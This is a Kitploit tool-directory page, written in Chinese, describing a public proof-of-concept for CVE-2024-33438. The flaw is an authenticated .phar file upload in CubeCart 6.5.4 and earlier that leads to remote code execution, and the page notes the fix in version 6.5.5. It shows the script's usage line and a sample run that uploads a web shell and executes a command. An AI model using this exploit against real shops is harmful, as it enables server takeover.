Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 存在一个任意文件上传漏洞,可导致远程代码执行(RCE)。 | Kitploit
工具/GitHubGitHub/julio-cfa/cve-2024-33438
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 存在一个任意文件上传漏洞,可导致远程代码执行(RCE)。

查看仓库
3372年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

任意文件上传导致远程代码执行 (CVE-2024-33438)

CubeCart <= 6.5.4 存在一个任意文件上传漏洞,可导致远程代码执行(RCE)。该漏洞影响应用程序的文件管理器及其过滤器,允许攻击者上传包含恶意代码的 .phar 文件。CubeCart 应更新至 6.5.5,该版本实施了安全补丁以修复此漏洞。

更多详情请参阅 CubeCart 在参考资料中的官方公告。

漏洞利用

已创建自动化概念验证(PoC),但也可通过文件管理器手动上传恶意 .phar 文件来利用此漏洞。

以下是 PoC 的使用方法:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

运行后,成功利用的预期输出如下:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

参考资料

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
下载工具